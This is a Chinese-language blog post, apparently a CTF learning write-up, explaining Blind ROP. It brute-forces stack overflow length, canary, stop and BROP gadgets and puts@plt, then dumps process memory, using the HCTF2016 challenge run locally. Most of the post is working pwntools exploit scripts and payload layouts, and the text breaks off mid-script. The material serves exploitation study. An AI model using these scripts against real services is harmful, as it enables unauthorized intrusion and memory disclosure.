<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="知识点原理在 ctf-wiki 上讲得很清楚了，这里不再重复 首先需要存在已知如何触发的栈溢出，而且需要远程的进程服务崩溃后不会re-rand 然后需要爆破出溢出所需的padding大小 若存在Canary则需要按字节爆破，例如Canary为 0x7766554433221100 ，则从倒数第二个字节开始逐字节爆破，即 padding + 0x0100 ，若Canary报错则说明倒数第二个字节错误">
<meta property="og:type" content="article">
<meta property="og:title" content="BROP">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2022/01/31/BROP/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="知识点原理在 ctf-wiki 上讲得很清楚了，这里不再重复 首先需要存在已知如何触发的栈溢出，而且需要远程的进程服务崩溃后不会re-rand 然后需要爆破出溢出所需的padding大小 若存在Canary则需要按字节爆破，例如Canary为 0x7766554433221100 ，则从倒数第二个字节开始逐字节爆破，即 padding + 0x0100 ，若Canary报错则说明倒数第二个字节错误">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-1.png">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-2.jpg">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0get_length.jpg">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0get_stop_gadget.jpg">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-3.jpg">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0get_Brop_gadget.jpg">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0get_puts_plt.jpg">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-4.png">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-5.png">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-6.jpg">
<meta property="og:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-7.jpg">
<meta property="article:published_time" content="2022-01-31T05:01:09.000Z">
<meta property="article:modified_time" content="2022-01-31T06:55:31.099Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="BROP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-1.png">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/01/31/BROP/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>BROP | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2022/01/31/BROP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BROP
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-01-31 13:01:09 / 修改时间：14:55:31" itemprop="dateCreated datePublished" datetime="2022-01-31T13:01:09+08:00">2022-01-31</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h3><p>原理在 ctf-wiki 上讲得很清楚了，这里不再重复</p>
<p>首先需要存在已知如何触发的栈溢出，而且需要远程的进程服务崩溃后不会re-rand</p>
<p>然后需要爆破出溢出所需的padding大小</p>
<p>若存在Canary则需要按字节爆破，例如Canary为 0x7766554433221100 ，则从倒数第二个字节开始逐字节爆破，即 padding + 0x0100 ，若Canary报错则说明倒数第二个字节错误，爆破至正确后继续爆破倒数第三个字节直至得到Canary值</p>
<p>我们需要根据程序的行为来猜测我们寻找的地址应该是什么，为此我们需要先找到 stop gadget</p>
<h5 id="stop-gadget"><a href="#stop-gadget" class="headerlink" title="stop gadget"></a>stop gadget</h5><p>当我们把返回地址覆盖成我们随意选取的内存地址时，程序会有很大的概率crash，但是也存在一种情况，即当我们控制程序返回到一块内存区域后，程序并没有crash，而是hang在那里，使我们能一直保持连线状态，我们将这种gadget称为 stop gadget 。同样我们需要通过爆破来寻找这样的 stop gadget</p>
<h5 id="Brop-gadget"><a href="#Brop-gadget" class="headerlink" title="Brop gadget"></a>Brop gadget</h5><p>我们需要将远程服务器dump出程序的内存到本地，为此我们需要一个输出函数，还要能控制对应寄存器的gadget，由于即便找到了 pop;ret 这样的gadget也很难知道其pop的是哪个寄存器，所以我们更倾向于找到__libc_csu_init 中的 pop6_ret（这里称为Brop gadget） 的地址，这样即可准确控制寄存器的值，另外 Brop gadget 往下偏移9即可得到 pop rdi;ret ，同理 Brop gadget 往下偏移7得到 pop rsi;pop r15;ret;</p>
<h5 id="寻找plt表"><a href="#寻找plt表" class="headerlink" title="寻找plt表"></a>寻找plt表</h5><p>为找到输出函数，我们需要找到plt表，plt表具有比较规整的结构，每一个plt表项都是 16 字节，且每个表项的6字节偏移处，是对该表项对应的函数的解析路径，即程序最初执行该函数的时候，会执行该路径对函数的 got 进行解析，如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">jmp [&#x27;func&#x27;]	6byte</span><br><span class="line">push index		5byte</span><br><span class="line">jmp dlresolve	5byte</span><br></pre></td></tr></table></figure>

<p>所以 return 到 plt 表项的开头时程序就会调用该函数（无论是否解析过），而 return 到 plt 表项 +6 处，则会再进行一次函数的解析，这也无所谓，因为最终同样会调用该函数。</p>
<p>当我们发现好多条连续16个字节对齐的地址都不会造成crash，而且这些地址+6的地址同样不会造成crash，那么我们有理由相信这就是某个plt对应的表项</p>
<p>所以我们可以通过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = padding + canary + p64(pop_rdi_ret) + p64(0x400000) + p64(addr) + p64(stop_gadget)</span><br></pre></td></tr></table></figure>

<p>这样的payload来判断 addr 是不是 puts@plt（在程序未开PIE的情况下，0x400000 是 ELF 文件的头部，其内容为“\7fELF”。</p>
<p>同理我们可以通过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = padding + canary + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(0x400000) + p64(stop_gadget)</span><br></pre></td></tr></table></figure>

<p>这样的payload来判断 addr 是不是 write@plt ，虽然这里没有控制 rdx，但调用函数时rdx经常性不为0，所以这种办法也存在可行性。如果要控制 rdx 的话我们可以试着寻找程序中有无 strcmp 及其系列函数存在，达到通过调用这样的函数来控制 rdx 。</p>
<h5 id="dump远程"><a href="#dump远程" class="headerlink" title="dump远程"></a>dump远程</h5><p>利用 plt 表中的 puts 函数，配合 useful gadget，来 dump 远程信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = padding + canary + p64(pop_rdi_ret) + p64(target) + p64(puts) + p64(stop_gadget)</span><br></pre></td></tr></table></figure>

<p>重复执行如上payload来讲远程的内存信息打印保存在本地，但是一次最多只能dump一个内存页的大小，也就是0x1000个字节</p>
<h5 id="脚本部分"><a href="#脚本部分" class="headerlink" title="脚本部分"></a>脚本部分</h5><p>获取padding大小的部分</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_overflow_length</span>():</span></span><br><span class="line">    i = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">9999</span>)</span><br><span class="line">            p.recv()</span><br><span class="line">            p.send(<span class="string">&#x27;a&#x27;</span>*i)</span><br><span class="line">            content = p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;回显的内容&#x27;</span> <span class="keyword">in</span> content:</span><br><span class="line">                i += <span class="number">1</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="keyword">return</span> i-<span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">return</span> i-<span class="number">1</span></span><br><span class="line">        </span><br><span class="line">length = find_overflow_length()</span><br><span class="line"><span class="built_in">print</span>(length)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Force_find_padding</span>():</span></span><br><span class="line">    padding_length=<span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            padding_length=padding_length+<span class="number">1</span></span><br><span class="line">            p = remote(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">9999</span>)</span><br><span class="line">            p.recv()</span><br><span class="line">            p.send(<span class="string">&#x27;A&#x27;</span> * padding_length)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;回显的内容&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> p.recvall():</span><br><span class="line">                <span class="keyword">raise</span> <span class="string">&quot;Programe not exit normally!&quot;</span></span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            log.success(<span class="string">&quot;The true padding length is &quot;</span>+<span class="built_in">str</span>(padding_length-<span class="number">1</span>))</span><br><span class="line">            <span class="keyword">return</span> padding_length</span><br><span class="line">    log.error(<span class="string">&quot;We don&#x27;t find true padding length!&quot;</span>)</span><br><span class="line"></span><br><span class="line">padding_length=null</span><br><span class="line"><span class="keyword">if</span> padding_length <span class="keyword">is</span> null:</span><br><span class="line">    padding_length=Force_find_padding()</span><br></pre></td></tr></table></figure>

<p>记录获取的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">log_in_file</span>(<span class="params">addr</span>):</span></span><br><span class="line">    f = <span class="built_in">open</span>(<span class="string">&#x27;puts.txt&#x27;</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">    f.write(<span class="string">&quot;the addr:0x%x\n&quot;</span>%addr)</span><br><span class="line">    f.close()</span><br></pre></td></tr></table></figure>

<p>获取 stop gadget 的部分</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_stop_gadget</span>(<span class="params">length</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    <span class="keyword">while</span> addr &lt; <span class="number">0x401000</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">9999</span>)</span><br><span class="line">            p.recv()</span><br><span class="line">            payload = <span class="string">&#x27;a&#x27;</span>*length + p64(addr) + p64(<span class="number">0</span>)*<span class="number">10</span></span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            content = p.recv(timeout = <span class="number">0.2</span>)</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;回显的内容&quot;</span> <span class="keyword">in</span> content:</span><br><span class="line">                <span class="built_in">print</span> <span class="string">&#x27;one_stop_gadget is at &#x27;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">                log_in_file(addr)  </span><br><span class="line">            addr += <span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            addr += <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>获取 Brop gadget 的部分</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_Brop_gadget</span>(<span class="params">length,stop_gadget_addr,addr</span>):</span></span><br><span class="line">    payload = <span class="string">&#x27;a&#x27;</span>*length + p64(addr) + p64(<span class="number">0</span>)*<span class="number">6</span> + p64(stop_gadget_addr) + p64(<span class="number">0</span>)*<span class="number">10</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p = remote(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">9999</span>)</span><br><span class="line">        p.recv()</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        content = p.recv(timeout = <span class="number">0.1</span>)</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;回显的内容&quot;</span> <span class="keyword">in</span> content:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">except</span> EOFError:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br></pre></td></tr></table></figure>

<p>检查 Brop gadget 的部分（防止addr本身是 stop_gadget）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check_Brop_gadget</span>(<span class="params">length,addr</span>):</span></span><br><span class="line">    payload = <span class="string">&#x27;a&#x27;</span>*length + p64(addr) + p64(<span class="number">0</span>)*<span class="number">10</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p = remote(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">9999</span>)</span><br><span class="line">        p.recv()</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        content = p.recv(timeout = <span class="number">0.1</span>)</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;回显的内容&#x27;</span> <span class="keyword">in</span> content:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">except</span> EOFError:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br></pre></td></tr></table></figure>

<p>结合上述两个部分得到 Brop gadget（一般可以不从0x400000开始）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_Brop_gadget</span>(<span class="params">length,stop_gadget_addr</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        <span class="keyword">if</span>(get_Brop_gadget(length,stop_gadget_addr,addr)):</span><br><span class="line">            <span class="built_in">print</span> <span class="string">&#x27;possible Brop_gadget at &#x27;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">            <span class="keyword">if</span>(check_Brop_gadget(length,addr)):</span><br><span class="line">                <span class="built_in">print</span> <span class="string">&#x27;success Brop_gadget at &#x27;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">                <span class="keyword">return</span> addr</span><br><span class="line">        addr += <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>获取 puts@plt 的部分（用这个脚本跑出来的地址好像需要 +10 个字节才是正确的地址，自行测试。同时如果将初始的addr设置的太大的话可能会跑出 call puts 指令的地址）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_puts_plt</span>(<span class="params">length,pop_rdi_ret</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">9999</span>)</span><br><span class="line">            p.recv()</span><br><span class="line">            payload = <span class="string">&#x27;a&#x27;</span>*length + p64(pop_rdi_ret) + p64(<span class="number">0x400000</span>) + p64(addr) + p64(<span class="number">0</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            content = p.recv(timeout=<span class="number">0.1</span>)</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;\x7fELF&#x27;</span> <span class="keyword">in</span> content:</span><br><span class="line">                <span class="built_in">print</span> <span class="string">&quot;We found puts_plt at: &quot;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">                <span class="keyword">return</span> addr</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                addr += <span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            addr += <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>泄露部分</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span>(<span class="params">length,stop_gadget_addr,pop_rdi_ret,puts_plt,addr</span>):</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p = remote(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">9999</span>)</span><br><span class="line">        p.recv()</span><br><span class="line">        payload = <span class="string">&#x27;a&#x27;</span>*length + p64(pop_rdi_ret) + p64(addr) + p64(puts_plt) + p64(stop_gadget_addr)</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        content = p.recv(timeout=<span class="number">0.2</span>)</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            data = content[:content.index(<span class="string">&quot;\n回显的内容&quot;</span>)]</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            data = content</span><br><span class="line">        <span class="keyword">if</span> data == <span class="string">&#x27;&#x27;</span>:</span><br><span class="line">            data = <span class="string">&#x27;\x00&#x27;</span></span><br><span class="line">        <span class="keyword">return</span> data</span><br><span class="line">    <span class="keyword">except</span> EOFError:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leakfunction</span>(<span class="params">length,stop_gadget_addr,pop_rdi_ret,puts_plt</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">while</span> addr &lt; <span class="number">0x401000</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        data = leak(length,stop_gadget_addr,pop_rdi_ret,puts_plt,addr)</span><br><span class="line">        <span class="keyword">if</span> data <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            result += data</span><br><span class="line">            addr += <span class="built_in">len</span>(data)</span><br><span class="line">        f = <span class="built_in">open</span>(<span class="string">&#x27;dump&#x27;</span>,<span class="string">&#x27;wb&#x27;</span>)</span><br><span class="line">        f.write(result)</span><br><span class="line">        f.close()</span><br></pre></td></tr></table></figure>

<h3 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h3><p>以 <a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow/brop/hctf2016-brop">HCTF2016 的出题人失踪了</a> 为例，因为自己没搭远程环境，所以打本地</p>
<p>按着上述思路确定步骤：</p>
<ol>
<li>确定漏洞是否为栈溢出，如果有则爆破出长度</li>
<li>判断有无Canary，如果有则爆破出Canary</li>
<li>找到 stop gadget</li>
<li>找到 Brop gadget</li>
<li>找到输出函数的 plt 地址</li>
<li>利用输出函数 dump 出程序内存</li>
<li>利用 dump 出的内存找到输出函数的got表地址</li>
<li>常规 ret2libc</li>
</ol>
<p>我们打开程序试着输入，查看正常的回显以及判断是否有栈溢出</p>
<img src="/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-1.png" class>

<img src="/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-2.jpg" class>

<p>所以用以下脚本跑出溢出长度 length</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_overflow_length</span>():</span></span><br><span class="line">    i = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = process(<span class="string">&#x27;./brop&#x27;</span>)</span><br><span class="line">            p.recv()</span><br><span class="line">            p.send(<span class="string">&#x27;a&#x27;</span>*i)</span><br><span class="line">            content = p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;No password, no game&#x27;</span> <span class="keyword">in</span> content:</span><br><span class="line">                i += <span class="number">1</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="keyword">return</span> i-<span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">return</span> i-<span class="number">1</span></span><br><span class="line">        </span><br><span class="line">length = find_overflow_length()</span><br><span class="line"><span 